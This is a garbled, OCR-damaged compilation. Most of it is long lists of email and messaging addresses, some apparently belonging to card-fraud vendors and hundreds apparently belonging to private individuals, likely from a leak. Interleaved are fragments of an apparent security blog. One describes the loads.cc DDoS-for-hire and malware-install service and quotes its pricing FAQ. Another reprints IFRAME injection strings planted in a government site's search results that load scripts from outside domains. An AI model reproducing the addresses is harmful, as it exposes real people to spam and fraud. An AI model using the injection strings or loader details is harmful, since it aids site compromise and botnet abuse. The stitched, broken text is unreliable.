oopexcard@yahoo.com 
mancarplok@gmail.com 
kingdumps49@yahoo.com 
sanickveriel@yandex.com 
value.toolsl1O06@gmail.com 
vendortoolsgoodcheap@gmail.com 
10010000@exploit.im 
webprofile@xmpp.jp 
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rubyverified@gmail.com 
kimdotcom464@gmail.com 
Gmail-wardarledge@gmail.com 
saintjames@jaim.at 
chapitooo@protonmail.com 
kollyrolex69@gmail.com 
dtkcards@protonmail.com 
swipeit@xmpp.jp 

Junior tj@yahoo.com 
sitehacks@mail2tor.com 
accssell@xmpp.jp 
carder007.ru@yahoo.com 
orangeclub@jabber.at 
dumps0502@gmail.com 
Dumpswithpin.ru@gmail.com 
jboy980@yahoo.com 
emilybeneth@yahoo.com 
Zhigi.gOQoD@jabber.org 

big b0Oss OO@yahoo.co.uk 
legit kimcah@yahoo.com 
davidcollins2008@yahoo.com 
cbziemah@yahoo.com 
johnyswonywoody@mail.com 
yoansamtiago@yahoo.com 
r00Ot@jabber.root.cz 
marvb2014@gmail.com 
elitelifel 7@hushmail.com 
jd1zzl3@exploit.im 
wOrldvalid@yahoo.com 
maclinil89@yahoo.com 
iiuli8@jabbim.cz 
slipknot88@mail2tor.com 
willsilencescott@gmail.com 
smitha3520@gmail.com 
victormohorovitch@hush.com 
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Konrencreas pemnane 


PATHTOCe K HAN HH NOWVECTRYATO BOO MOereryUjO 
YY BAM MOSACKT ARAT PDaMOTHMe H OTROTCTOOHHAES 
Mpeeepra KOnteHta Ha yHeKanewerte 


2 ANA NENA ABATONEA Ha MECeENEY OPHTMamHocTh pedepat 


# [OQ ONLY FOR MEMBERS 


Now the juicy details regarding loads.cc. During the time of posting this, the malicious domain 
is starting to redirect to a very descriptive one, which basically says "given up on ddos-ing", 
and a featured ad in between loads.cc’s old interface is pitching the new service - contextual 
advertising consultations, as you can see in the attached screenshot. Apparently, a little more 
in-depth research acts as public pressure, especially when they’re lazy enough to have a great 
deal of malware variants "phone back home" to their promotional domain. However, the cur- 
rent one responding to 67.228.69.191 is hosted by SoftLayer, and is using ns1.4wap.org as 
DNS server provided by Layered Technologies again confirming the Russian Business Network 
connection since, both, Layered Technologies and SoftLayer are known to have been and con- 
tinue providing services to the RBN, knowingly or unknowingly. Moreover, the malware infected 
counter at the stats section continues reporting new additions. 


Being one of the most venerable examples of DDoS for hire services, it’s worth reposting its 
FAQ in an automatically translated fashion, so that a better perspective to the dynamics of 
offering such services is provided to the readers. Here’s the FAQ on using the service, which is 
relatively easy to understand : 
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seller.best93@yahoo.com 
Shamil@jabber.se 
bezik87@yandex.ru 
owenjames269@gmail.com 
torcarders@jabber.ru 
temptest92130364@gmail.com 
rakapaksi@yahoo.com 

blaq _dumpz7@yaho.com 
neckocio@outlook.com 
edubble.eg@gmail.com 
cc.owner.74@bk.ru 
blue5090@safe-mail.net 
kbksrb@ymail.co 
John7Doe@hotmail.com 
support@insorg.org 
the.x106@yahoo.com 
lonerick@outlook.com 
anonyriadh@gmail.com 
riadh.tnx@gmail.com 
supercc247@gmail.com 
dumpboss@gmail.com 
hectsheerin@gmail.com 
garp.thefist@yahoo.com 
Authorar@yahoo.com 
ryoung415@aol.com 
sohail4001@yahoo.co.uk 
k.schedler@hotmail.com 
triskeltree@aol.com 
t.kladaric@hotmail.com 
eroxy96@yahoo.com.au 
dominique.lesidaner@yahoo.fr 
berta.baquero@hotmail.com 
dumpssellers@yahoo.com 
servicecards19@gmail.com 


Zimmer _Julius@yahoo.co 
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Zimmer _Julius@yahoo.com 
freshgood7@gmail.com 
morichetools@jabber.ru 
gzhyrrrr@gmail.com 
grigory1887@xmpp.jp 
eligos1560@gmail.com 
cvvseller20@yahoo.com 
card.service4u@yandex.com 
Zhiqi.gOoD@jabber.ru 
agingo9410@gmail.com 
masakoito@hotmail.com 
masama0906@hotmail.co.jp 
saeedarif@hotmail.com 
arifsaeed391@yahoo.ca 
Scarletoak@live.ca 
ontarioscarletoak@live.ca 
lewis ryan 9@hotmail.com 
lewisryan8378@yahoo.ca 
tiana_cheerleading@hotmail.com 
tiana _cheerleading@hotmail.co 
muffyandfluffy@hotmail.com 
dawn.mckechnie@stryker.com 
Dawn1970@hotmail.ca 

tessa _wangcm@hotmail.com 
mohsinfiaz@hotmail.com 
yaqoobatcha24@hotmail.com 
yangaihua@hotmail.com 
alex.benz@hotmail.com 
mark.soles@hotmail.com 
russianmaster490@gmail.com 
russian-master@xmpp.jp 
enb5122@yahoo.com 
SmokemirrorO00@Gmail.com 
todguru@yahoo.com 
taman@xmpp.jp 
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perlilari@jabbim.com 
theammar.b@gmail.com 
triplefun@hushmail.com 
sosodp@yahoo.com 
samseiber84@gmail.com 
almightyalmight@elude.in 
banalitybiz@exploit.im 
banalitybiz@default.rs 
banality@fuckav.in 
antonioalbertishop@gmail.com 
arlin.pyatt@yahoo.com 
dimitripelles@xmpp.jp 

xiao _zhuzhu _good@163.com 
kommetss@yandex.com 
kommetss@jabbim.com 
justnormal@outlook.com 
joesmith210972@gmail.com 
mrking0899@protonmail.com 
admin@paysell.info 
makeeasy@xmpp.jp 
skillful@jabber.ru 
Bian.lien@jabber.ru 


johnyclay.111@gmail.com 


alphal7research@securejabber.me 


xchange63@yahoo.com 
annexomar@gmail.com 
easygig2015@gmail.com 


reginaserwa50@gmail.com 


Skrillexcashmoney@outlook.com 


amigo trade@xmpp.jp 
support@stormwall.pro 
hacktools111@yahoo.com 
shawnnetto9@gmail.com 
ggm@jabbim.cz 
ggmccloud1lteam@exploit.im 
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wize@exploit.im 
paypalclub@jabbim.cz 
paypalclub@exploit.im 
ca001001@jabbim.cz 
iiuii8@xmpp.jp 
skeeper@jabb.im 
donfino67@gmail.com 
joseluisperales6@yahoo.com 
bankmofocashout@gmail.com 
bes dumpsl12@yahoo.com 
dunson@xmpp.jp 
torpri@prv.name 
1Insider@xmpp.jp 
nq21store@gmail.com 
david1112.ch@gmail.com 
ug.destination good63@yahoo.com 
khangulf80@gmail.com 
jamalbashybashy@yahoo.co.uk 
vendOr@sigaint.org 
Troko@mailcrypx.co 
softwareneed40@yahoomail.com 
Praiseogo2001@yahoo.com 
578@gmail.com 
AdmintTrustedCarders@protonmail.com 
kali.wiggin@gmail.com 
paulo@trell.com.br 
DarkGeralt10@protonmail.com 
mustangcarder911@gmail.com 
Lemesheloyza@gmail.com 
simplysusan411@gmail.com 
awjohns@melbpc.org.au 
natalia.neal72@gmail.com 
tacticaldefence@gmail.com 
neillinke@bigpond.com 
roger@yogawood.se 
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jeovania.santana@Outlook.com 
Krystengrossnickle@yahoo.com 
legionx39@gmail.com 
heinz.straub@web.de 
michaelronson@ntlworld.com 
karanpmcl13@aol.com 
suewoz@yahoo.com 
grannies3als@yahoo.com 
tra3879@gmail.com 
sigleytp@gmail.com 
bubbabj226@charter.net 
awillhide@yahoo.com 
Sierrahope2000@gmail.com 
jbensmith62@gmail.com 
janetpster@gmail.com 
d.aras@smartformer.de 
Devpiszcz@yahoo.com 
alexandraa122595@gmail.com 
santos558247@att.net 
kelli.fox@gmail.com 

roger _shirk@wahazel.com 
Wilver calderon@yahoo.com 
jlschafferl13@gmail.com 
william _bromley81@hotmail.com 
Mariaback92@yahoo.co.uk 
rfreeman22@comcast.net 
brashar kathee@yahoo.com 
samuel@frostvfx.com 
Spjoglekar@hotmal.com 
candacewilliams906@yahoo.com 
sabeenkhawaja07@hotmail.com 
LopezmicheleO60@gmail.com 
usgaboo@hotmail.com 
smcrossman@gmail.com 


traceybetts99@yahoo.com 
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samueletci@gmail.com 
sara.serone@gmail.com 
f.edo@hotmail. it 
a.borsa@hotmail.it 
gepponi.andrea@gmail.com 
usturoiviola2@gmail.com 
luisomMk18@hotmail.it 
antuttu@gmail.com 
nsamueletci@gmail.com 
nsara.serone@gmail.com 
nf.edo@hotmail.it 
na.borsa@hotmail.it 
ngepponi.andrea@gmail.com 
nusturoiviola2@gmail.com 
nluisomk18@hotmail.it 
nantuttu@gmail.com 
ficuspolymers@rediffmail.com 
deciluudbz@gmail.com 
Harryvannatter2014@outlook.com 
sarahleckerO80699@gmail.com 
lupercy@hotmail.com 
smurf2001uk@hotmail.com 
coadyward@outlook.com 
stephenwaring1958@gmail.com 
blhO610@yahoo.com 

amin _filho@hotmail.com 
Guilherme _silio@hotmail.com 
majena2604@o2.pl 
jking.17k@gmail.com 
KronstadADDRESS TowneAL1450NORWAYbear87o0slo@hotmail.com 
jmc3139@yahoo.com 

frito st@yahoo.com 

twana __streete@yahoo.com 
alba.deborah@yahoo.com 
camjw1986@yahoo.com 
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Oliverjal5@yahoo.com 
isadoresylvia@yahoo.com 
karen26k@yahoo.com 
marinaincali@yahoo.com 
crone.lars@gmail.com 
budinsky@optonline.net 
t47320712@gmail.com 
titanmtc60@gmail.com 
andrewmarquis77@gmail.com 
joakim _gullstrand@hotmail.com 
liamm1979@hotmail.com 
michjaye@gmail.com 
Hosea43@gmail.com 
amywarf@aol.com 
vondaa4prve@yahoo.com 
flaviacontin@yahoo.com.br 
Isarog221@ymail.com 
tony@therichardsonlawfirm.com 
rhea.bragat@gmail.com 
philkehl13@gmail.com 
rflboissen@gmail.com 
Raniheck@aol.com 
nerminceylan2004@gmail.com 
ugurylmzu@gmail.com 
reecepattison@gmail.com 
mamaof2g1lb@yahoo.com 
charles.allen4d4@aol.com 
tabihamiltonl13@gmail.com 
ral9154@hotmail.com 
FIREBASE447376782077@user.lightinthebox.com 
drolet.simon@icloud.com 
Lesliestot@gmail.com 
debbielallen@yahoo.com 
dzr59281debatu t@hotmail.com 
ThomasASimmons@teleworm.us 
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mileyivettel7@gmail.com 
prliza85@yahoo.com 
atnnguyen2@gmail.com 
drw@shiraig.co.uk 
rOmist@icloud.com 
anastasiawangw@gmail.com 
service@paypal.com 
nderkowski@gmail.com 
hsaleem2@hotmail.com 
chloe.skene@yahoo.com.au 
mjs22@utas.edu.au 
rasanca2@hotmail.co 
laabcango@gmail.com 
Joeldsmithwork@gmail.com 
irisdwrds@yahoo.com 
Out2jen@yahoo.com 
Adrienne Moore9@silmotor.it 
linda 6026@comcast.net 
camilavirgen1@icloud.com 
donnamorgan818@yahoo.com 
Julier81.jr@gmail.com 

kirsty _1808@hotmail.co.uk 
Rodriquez9730@gmail.com 
edarium86@hotmail.com 
taslimehmetmehtap@hotmail.com 
nozdemir81@hotmail.com 
johndoe@fastmail.com 
nick.thomas.oz@gmail.com 
venancio rod@hotmail.com 
it.inkop@tv4.se 
flygaudard@gmail.com 
remy.couton.renaultagriculture@gmail.com 
bbrmedina@aol.com 
bjl643@aol.com 
sw.sebbagh@gmail.com 
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rojas.lola@ymail.com 
Carwee94@gmail.com 
josereyna66@yahoo.com 
nvnt@outlook.com 
Ajfalk0921@gmail.com 
debriannascott@gmail.com 
desireeplascencia0831@gmail.com 
lauren79@yahoo.com 
dalewoody45@yahoo.com 
Espinard15@gmail.com 
teddy.cosson@gmail.com 
ashleyseaman85@gmail.com 
elkescholz60@gmail.com 
Aims407@sbcglobal.net 
pamela0506@icloud.com 
johnaustinobrien@gmail.com 
Callie. nunez@yahoo.com 
samethergul@icloud.com 
oguzorl3854@gmail.com 
reginapa-99@hotmail.com 
Salon5460@yahoo.co.uk 
devindillard25@yahoo.com 
aerial planets@yahoo.com 
Qandhy1@aol.com 
susanl89@comcast.net 
emily65@aol.com 
EMIRATESpayment@doduae.com 
Harriplane@outlook.com 
jeddi2511@gmail.com 
samantha.woldanski@sbcglobal.net 
ndebbielallen@yahoo.com 
nikkifaint@hotmail.com 
mehmethakki.kurt@gmail.com 
hirsch55@comcast.net 
gameboy0511@gmail.com 
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rosmundadamico@yahoo.it 
mersinli furkan 33@hotmail.com 
n.groenhuysen@googlemail.com 
nixonkieran99@gmail.com 
davidisownage@gmail.com 
irishboy117@gmail.com 
svickol3@gmail.com 
jaybanayat@gmail.com 
kirkendolls777@gmail.com 
fionakoppe@yahoo.co.uk 
kylehweissman@gmail.com 
WilliamSRaber@gustr.com 
leslie@ljscpa.com 
rcpop2099@aol.com 
chrissy.baker@hotmail.com 
hcsbus25@aol.com 
lorrainr76dix@gmail.com 
mikeskeates123@outlook.com 
mcneemichelle@gmail.com 
mittmann@cox.net 
zachary.craft@gmail.com 
marilia.serra@gmail.com 
EscrowTeam@protonmail.com 
cttmarine@telefonica.net 
damani7cp@aol.com 
Jasminegallaher22@gmail.com 
jennaapiress@icloud.com 
filyche@gmail.com 
TieganMcrae@gmail.com 
newaldshaqq928@gmail.com 
garciaxn@gmail.com 
Cheyvan@icloud.com 
panda281072@gmail.com 
Andrea.hutch@yahoo.com 

jcb 0420@hotmail.com 
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Tetal:; 105007 
Online: S744 


Heewe 16 mecnenere 240C0; 995 


Hotere 14 NocmeguHe 24 4aca: FOI 


Cratectvxes me Crpamant 
floctymao ba MocnagHHe C 2 Beero ba MOCNOA Hit mn? 


- All that is pure downloads nothing is loaded simultaneously 

- The "mix" is not Buro countries on specified individual prices 

- Loaded only those countries which are specified in the problem 
- The country is determined to maxmind geoip 


- When it ALL loaded all countries and the price of downloads is calculated separately for each 
country that is DE for the download you pay for a $ 0.2 PE 0.03 


- Prices for downloads can sometimes vary slightly this watch themselves 


- As such, the concept of mix does not exist, each country has its own price, and if the country 
is not clearly specified in the price is $ 30 price / 1k 


- The money is withdrawn from the account in accordance with the facts and running leaps 
ekze by car users 


- In the balance on deposit $ 5 or less stopped loading 
- No minimum, it is possible to load even though 3 pc 10k limit pointing in the problem 


- The claims, made by ALREADY download will not be accepted, DICOM small parties or do the 
test to check quality 


- Following the establishment of tasks it must be activated by clicking on the link in the status, 
the same method could be suspended 
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fifties1 @touch-of-nostalgia.com 
pauseretrol990@gmail.com 
Lucas.sherwood28@gmail.com 
frannie90164@yahoo.com 
veronicalvilla@hotmail.com 
aecashO1@hotmail.com 
Christianboutte1991@yahoo.com 
Rinaldoizzo428@gmail.com 
cfortucci@gmail.com 
Lavonneperson@outlook.com 
nLavonneperson@outlook.com 
sacrificiomartinezbaustista94@gmail.com 
jrpetersmb@gmail.com 
julienprivat@gmail.com 
tommy.lerstrand@gmail.com 
Lunden79@hotmail.com 
bradley.bryantl9@yahoo.com 
gato.siguenza@gmail.com 
amygivoni@hotmail.com 
Lherrick51@gmail.com 
Igitten@mac.com 
finkstacey8@gmail.com 
comfortbamidele65@yahoo.com 
scottmasters73@gmail.com 
smith223@hotmail.com 
Christyspurlin@comcast.net 
bcepeda@msay.com.ar 
dewey@barberandcompany.com 
lauren.libaw@gmail.com 
arkrug04@gmail.com 
kerrie444@hotmail.com 
yairaltamiranda@hotmail.com 
ty.cobb@gmo.com 
Visionslovenija@gmail.com 


jaron.dunford@gmail.com 
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preetul20@yahoo.com 
nalexandraa1l22595@gmail.com 
cmakaritis@sbcglobal.net 
ashleybissett27@igmail.com 
kmac31lemail@gmail.com 
nickbanyard95@hotmail.com 
Jackiekaim@msn.com 
jana-heinhold@t-online.de 
roland.gaeng@t-online.de 
pierre.eichin@t-online.de 
tmpeng89@t-online.de 
no-willkomm@t-online.de 
gummistute22j@t-online.de 
b-mees@t-online.de 
mumbo07@t-online.de 
petermachirus@t-online.de 
hans-martin.huebbe@t-online.de 
superpia97@t-online.de 
pemagori@t-online.de 
s.gawron@t-online.de 
sicariusnex@t-online.de 
nroland.gaeng@t-online.de 
npierre.eichin@t-online.de 
ntmpeng89@t-online.de 
nno-willkomm@t-online.de 
ngummistute22j@t-online.de 
nb-mees@t-online.de 
nmumbo07@t-online.de 
npetermachirus@t-online.de 
nhans-martin.huebbe@t-online.de 
nsuperpia97@t-online.de 
npemagori@t-online.de 
ns.gawron@t-online.de 
nsicariusnex@t-online.de 
chickiebabe82@yahoo.com 
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Tiagofbarros.to@gmail.com 
zamcon002@hotmail.com 
Kaypeaxo@hotmail.com 
carrieebrewster@gmail.com 
Vanesatorres697@gmail.com 
rarich25@gmail.com 
kennethbbarbosa@gmail.com 
jemaggiore@gmail.com 
pamwachter@yahoo.com 
office@hrs.de 
bobbelsy83837@yahoo.com 
jordyn _fortner@yahoo.com 
fayesfunnyfarm@sbcglobal.net 
olivia.whitaker3@gmail.com 
Sara.gomez91@gmail.com 
jakeaudenried87@gmail.com 
Chris.p.fasano@gmail.com 
Car panthers 1@yahoo.com 
Nicktumolo@yahoo.com 
Banachsmith@aol.com 
naknight297@gmail.com 
elizabeth. pellerito@gmail.com 
jlmay8585@gmail.com 
jnikd@LMK.com 
smartypartymarty88@gmail.com 
oconnorrod733@gmail.com 
jarod.ruggles123@gmail.com 
fennickl1@aol.com 
raphaela.stw@gmail.com 
ojzamzes@yahoo.com 
Jondoe4h@gmail.com 
tweety022103@yahoo.com 
Lydiashuck@gmail.com 
LBrockberg@gmail.com 
shultquistO3@yahoo.com 
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vitor _menezes O04@hotmail.com 
wagnerfah@yahoo.com 
Sherazali36@gmail.com 
sophie4790@hotmail.co.uk 
melball78@yahoo.co.uk 
Lexiipaigel125@yahoo.com 
annabelle.mar@free.fr 
studiopat.loudeac@sfr.fr 
alban.peignot@wanadoo.fr 
sabsabiayman@gmail.com 
lacee curlee@hotmail.com 
mikedbowdem@yahoo.com 
jlandiggy@yahoo.com 
cmoreiradibacco@yahoo.com 
lonstud68@outlook.com 
malen81@hotmail.com 
ocampohui@gmail.com 
dcb72876@yahoo.com 
andrea.lyn21@yahoo.com 
rgwooding@gmail.com 
meld2200@gmail.com 
moxyb97@hotmail.com 
rdevlin@jaimedicalsystems.com 
nrdevlin@jaimedicalsystems.com 
Abbey.weyhenmeyer@yahoo.com 
grapes.whiting@gmail.com 
vbraga25@gmail.com 
drwimpey@gmail.co 
megansmith@outlook.com 
yazzy59@yahoo.com 
laura.petis@gmail.com 
jobromley2000@yahoo.co.uk 
annah.tps@gmail.com 
madelinehoctor@gmail.com 
krypto.nate97@gmail.com 
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lucastorre.lt@gmail.com 
stradssteen@gmail.com 
arvt90@gmail.com 
cblanchard33@gmail.com 
emgarcia@charter.net 
cla06a@gmail.com 
attekyttala04@gmail.com 
paypal11922mail11bot922@yahoo.com 
Javiermartinezn1974@gmail.com 
dbhanna64@aol.com 
ndbhanna64@aol.com 
nt47320712@gmail.com 
ntitanmtc60@gmail.com 
linney123456@aol.com 
jerrisprime@gmail.com 
nlinda 6026@comcast.net 
bettiannjean@hotmail.com 
emericeusebe@orange.fr 
antony.dammekens@orange.fr 
fredon13@free.fr 
beaufilsmapa@orange.fr 
p.meunier86@orange.fr 
alisu2005@gmail.com 
na@na.com 
madeline.leya@stvincent.edu 
pradeepmurthy83@gmail.com 
ninjalord@altmails.com 
Staceyc0502@hotmail.co.uk 
mikenjue@yahoo.com 
stevejmckenzie@msn.com 
charlottemarierose@hotmail.co.uk 
janewilliams.mface@gmail.com 
p.riley@me.com 
emmalarkin3@msn.com 
rups _10@hotmail.com 
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cheekymonky90@hotmail.co.uk 
natkate2012@hotmail.com 
synowiec97@gmail.com 
andyjwalker@mac.com 

louise _francis28@hotmail.com 
gejoorchard@googlemail.com 
amylane66@hotmail.com 
jeffrey.shaw@btinternet.com 
nicola _blaney@yahoo.co.uk 
charlotteroberts170992@hotmail.co.uk 
get.carter72@yahoo.co.uk 
hollie h _94@live.co.uk 
westry15@gmail.com 
whitey-81@hotmail.com 
wierzyn@gmail.com 
wgonzalezaraya@gmail.com 
wilke.daniel@hotmail.com 
williams cody m@yahoo.com 
wilhudson0530@gmail.com 
wlmiulove@gmail.com 
wojhan007@o2.pl 
wmartor@yahoo.com 
willstehlin@gmail.com 
wyatt0717@gmail.com 
xanderdupreez007@gmail.com 
x034700@hotmail.com 
wwellow@aol.com 
x13ally13x@gmail.com 
Xjc0O2x@yahoo.com 
xXxgn2xx@gmail.com 
y.tsaroumis@gmail.com 
y.havermans@gmail.com 
yigitnar@gmail.com 
yoram.abr@gmail.com 
yujirodrigo@hotmail.com 
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yuki.umezawa.9.26@gmail.com 
younestreet@hotmail.com 
yrowland74@gmail.com 
yuki.0916.kKomo@gmail.com 
zarahgroves@gmail.com 
yvonne.mihajlovich@gmail.com 
zayad10@hotmail.fr 
zackeym@live.co.uk 
zeezee@talk21.com 

zachary _adamsO6@yahoo.com 
zakholmes88@gmail.com 
zhartig@yahoo.com 

zero ott@hotmail.com 
zwest87@gmail.com 
Zyanna.oconnell@gmail.com 
a-simone93@hotmail.it 
a.c.van.as@gmail.com 
a.aignelot44980@gmail.com 
a.cortellesi@gmail.com 
a.cortes.godoy@gmail.com 
a.barnstone@hotmail.co.uk 
a.branzell@gmail.com 
a.calman@btinternet.com 
a.cudrnak@gmail.com 
a.g.karatas@hotmail.com 
a.holmqvist9@gmail.com 
a.duong96@hotmail.com 
a.ishiguro.stbe@gmail.com 
a.kilic@uzermakina.com 
a.good@verizon.net 
a.melis2@chello.nl 
a.ozerkan@hotmail.com 
a.moraru@btinternet.com 
a.omegna@gmail.com 
a.ottink@web.de 
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a.seuss@gmx.de 
A.seldon@hotmail.co.uk 
a.pereira@bia.fr 
a.rushmiller@gmail.com 
a.tsilfidis@gmail.com 
a.zariff@yahoo.com 
a.vadiyampeta@gmail.com 
a.zuk@interia.pl 
a01.song1998@gmail.com 
a.wolohan@ntlworld.com 
al3c10g97@hotmail.com 
a_angel ov@hotmail.com 
A _fa110n@hotmail.com 
a_polykarpou@hotmail.com 
a _nucette@hotmail.com 
a_caouette@aol.com 
a_vogel@aol.com 
aaamaggie@gmail.com 
AadvanNoort@gmail.com 
stratfor@gaige.net 
example@example.com 
winterj6@hotmail.com 
anitalane27320@yahoo.com 
Irmitch@comcast.net 
mugsy1667@gmail.com 
alejandratoledano@yahoo.com 
wojtek12315@gmail.com 
zdaviel@hotmail.com 
vreiche@yahoo.com 
Sunnytomar5566@gamil.com 
bear87oslo@hotmail.com 
EscobarOne@tutanota.com 
Codie.simpsonl@gmail.com 
andre.javier.tz@outlook.com 
starry-22@hotmail.com 
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hollydaisya@verizon.net 
Caudle98@live.com 
m.turnipseed@prodigy.net 
tom@hhg.net 
gwendoline.soyez@sfr.fr 
carolynequinlan@gmail.com 
danielleinfl333@yahoo.com 
marcela _roldan63@hotmail.com 
michele@iamscribe.com 
olencarolfore@yahoo.com 
MKriha@Aol.com 
arupkroy@rediffmail.com 
ZZZZ111@gmail.com 
22ZzZ111@protonmail.com 
pkphilips@comcast.net 
frolich.miriam@gmail.com 
hollynigh@ymail.com 
veronica.nilsson76@gmail.com 
ivonnepgiraldo@gmail.com 
|.mildton@bredband.net 
nEscrowleam@protonmail.com 
pascal.reuther@free.fr 
nomadines@orange.fr 
Inhortemel@aliceadsl.fr 
anne.cattin@orange.fr 
jennifer.bourqui@orange.fr 
binaandmaxfamily@wanadoo.fr 
nannabelle.mar@free.fr 
nstudiopat.loudeac@sfr.fr 
nalban.peignot@wanadoo.fr 
nemericeusebe@orange.fr 
nantony.dammekens@orange.fr 
nfredon13@free.fr 
nbeaufilsmapa@orange.fr 


np.meunier86@orange.fr 
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npascal.reuther@free.fr 
nnomadines@orange.fr 
nInhortemel@aliceadsl.fr 
nanne.cattin@orange.fr 
njennifer.bourqui@orange.fr 
nbinaandmaxfamily@wanadoo.fr 
m3o0wz3rz@gmail.com 
fireman.sam@blueyonder.co.uk 
Sue.pym@hotmail.co.uk 
lilypillyO2@hotmail.com 
nmustangcarder911@gmail.com 
TiffanyBT44@gmail.com 
nKrystengrossnickle@yahoo.com 
ravaud01@gmail.com 
nlupercy@hotmail.com 
nwojtek12315@gmail.com 
nzdaviel@hotmail.com 
nvreiche@yahoo.com 
nravaud01@gmail.com 
bim47@aol.com 
accountholdername@fastmail.com 
virginiabarkley421@aol.com 
john.doe@gmail.com 
9246240001 _apvreddy@gmail.com 
lrogner@ymail.com 
gparvool080892@gmail.com 
MissyCSheffield@cuvox.de 
Liamdaves@protonmail.com 
procrd@gajim.org 
procrd@exploit.im 
nicolaicaves@snugmail.net 
fankonanovari@decoymail.net 
michealdarech@outlookpro.net 
nfankonanovari@decoymail.net 
nprocrd@exploit.im 
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- Pole challenge "received" shows how many bots believed assignment, it is usually little more 
than a "loaded" on the fabric sur somehow prichnam some boats were not able to download 
and run your ekze dolzhili or not yet know 


Undercover DDoS in between contextual advertising, or "giving up on DDoS" entirely? Let’s 
wait and see, without being naive enough to forget that this among the hundreds of other DDoS 
for hire services currently available in the wild. 


1. http: //www.securecomputing .net .au/news/71788, screensaver-spam-is-new-malware-from-old-gang-sunbelt .aspx 


2, http: //sunbel blog. blogspot .con/2006/08/dangerous-loadscc-nalvare-gang-re heal 
3, http: //ddanchev. blogspot .con/2007/10/potnet~on-denand-service. nea 

4, http://adanchey blogspot .con/2008/02/blackenergy-ddos-bot-web- based chal 

5, http: //ddanchev.bLogepot .con/2007/09/google-hacking-for-npacks~2unkers-and. htal 


4.3.10 More High Profile Sites IFRAME Injected (2008-03-12 14:44) 


Your search of Irish government information for <h1>Nude Cartoon Pom</hi><IFRAME 
src=/fbxdzw.info/1> retumed no results. Please try to use broader terms, ... 

www. cso. ie/px/u/search/search asp7q=%3Ch1 %3ENude+Cartoon+Pom%3C/ni %3E% 
3CIFRAME %20src=//jbxdzw. info/l %3E - 6k - Cached - Similar pages 


rh resul 
Your search of Irish government information for <h1>The Ant Of Nude 
Photography</h1 ><IFRAME src=//rerkqz.info/1> returned no results. ... 
www.cso.ie/.../search.asp?q=%3Ch1 %3EThe+An +Of+Nude+Photography %3C/h1 %IE% 
SCIFRAME %20src=//rerkqz. info/1%3E - 6k - Cached - Similar pages 


Search results 

Did you mean <h1>Nude Pictures Of Divas</h1><IFRAME src=//hickey.info/1>? Your search 
of Irish government information for <h1>Nude Pictures Of... 

www.cso.ie/px/u/search/search asp?q=%3Ch1 %3ENude+Pictures +Of+Divas%3C/h1 %3IE% 
SCIFRAME%20src=/kedny info/1%3E - 6k - Cached - Similar page 


Your search of Irish government information for <h1>Mod The Sims 2 Nude 
Patch</h1><IFRAME src=//qwhhxq. info/1> returmed no results. ... 

www.cso,ie/,../search.asp?q=%3Ch1 %3EMod+The+Sims+2+Nude+Patch%3C/nl KIER 
3CIFRAME%20src=//qwhhxq. info/1 %3E - 6k - Cached - Similar page 


rch resul 
Your search of Irish government information for <h1 >Hot Nude Celebs</h1 ><IFRAME 
sic=//xegtkf.info/1> retumed no results. Please try to use broader terms, ... 
www. cso. ie/px/u/search/search asp7q=%3Ch1 %3EHot+Nude+Celebs%3IC/hl %3IE% 
3CIFRAME%20src=//xegtkf info/1 %3E - 5k - Cached - Similar pages 


Search results 

Your search of Irish government information for <h1>Hot Nude Blonde Girls</ht ><IFRAME 
src=//ygbtne.info/1> retumed no results. ... 

www.cso.ie/px/u/search/search asp?q=%3Ch1 %3EHot+Nude+Blonde+Girls %3C/h1 HIE 
SCIFRAME%20src=//ygbtne. info/1 %3E - 6k - Cached - Similar page 


Your search of Irish government information for <h1>Nude Latina Gallenes</h1><IFRAME 
src=//psyckr.info/l> retumed no results. ... 

www.cso.ie/px/u/search/search asp?q=%3Ch1 %3ENude+Latina+Galleries%3C/h1 %3E% 
3CIFRAME%20src=//psyckr.info/1 %3E - 6k - Cached - Similar pages 


Your search of Irish government information for <h1>Nude Photos Of Lesbians</h1><IFRAME 
src=//hdxsjn.info/1> retumed no results. ... 

wew.cso.ie/... /search.asp?q=%3Ch1 %S3ENude+Photos+Of+Lesbians%3C/h1 %3E% 
SCIFRAME%20src=/hdxsjn.info/1 %3E - 6k - Cached - Similar pages 


Search results 

Did you mean <h1>Amateur Nude Post</hi><IFRAME sre=//zdksqj.info/1>? Your search of 
Irish government information for <h1>Amateur Nude Posts</h1><IFRAME ... 
www.cso.ie/px/u/search/search asp?q=%3Ch1 %3EAmateur+Nude+Posts %3C/h1 %3E% 
SCIFRAME%20src=//zdksqj.info/1 %3E - 6k - Cached - Similar page 
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caxoferiv@wmail2.com 


tarjetit@servidor.fciserver.com 


ntarjetit@servidor.fciserver.com 


xstbbn@123stopsmoking.org 
Tim@HaasMuth.com 
cash.severin@extraale.com 


cmlidjr25@yahoo.com 


kingofallkings666@protonmail.com 


brussitos@gmail.com 
johnsamuel@vsnl.net 
IIbaileyOO@yahoo.com 
nilbaileyOO@yahoo.com 
hazael-elite@hotmail.com 

c _collins15@outlook.com 
tamidickey2005@yahoo.com 
mronda71@yahoo.com 
Simonas.Gorelis7@gmail.com 
mp41510@gmail.com 
bukceline@gmail.com 
zarlengod@gmail.com 
sandeep.sig678@gmail.com 
noramfuller@gmail.com 
bangtoyib2@gmail.com 
andersonasantos@gmail.com 
nmp41510@gmail.com 
nbukceline@gmail.com 
nzarlengod@gmail.com 
nsandeep.silg678@gmail.com 
nnoramfuller@gmail.com 
nbangtoyib2@gmail.com 
dgonzalez6@twu.edu 
Kristiaen@gmail.com 
highcard1@secmail.pro 
jeosenco@gmail.com 


aviamail@list.ru 
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f13008830@gmail.com 
MrfishscaleNL@protonmail.com 
ezyonlinemoney007@gmail.com 
Mcscoot@sj.ms 
nMcscoot@sj.ms 
jyleal5@gmail.com 
ngtatthong@gmail.com 
jungdavid09@protonmail.com 
hannelore-mellrichstadt@gmx.de 
j.boze@cox.net 
mark.ballantyne3@virginmedia.com 
rsissom@twc.com 
delrue.roger64@orange.fr 
terrellgentry@hotmail.com 
vanessasamantha@hotmail.com 
Kerlim@jabb3r.de 
XardySSN@exploit.im 
7269@xmpp.jp 
tsar7269@dismail.de 
n7269@xmpp.jp 
ntsar7269@dismail.de 
klausvygrn@creep.im 

rlees _rebels@yahoo.com 
info@esteticaloto.es 
susanjthornton@gmail.com 
mrmorris1981@gmail.com 
mdvs196@gmail.com 
mulamoose@xmpp.jp 
nmulamoose@xmpp.jp 
carollendel4319@outlook.com 
ncarollendel4319@outlook.com 
bestflipper339@mail.ru 
Wu4mdevilking@gmail.com 
Tinmarv@outlook.com 


leonorl65@hotmail.com 
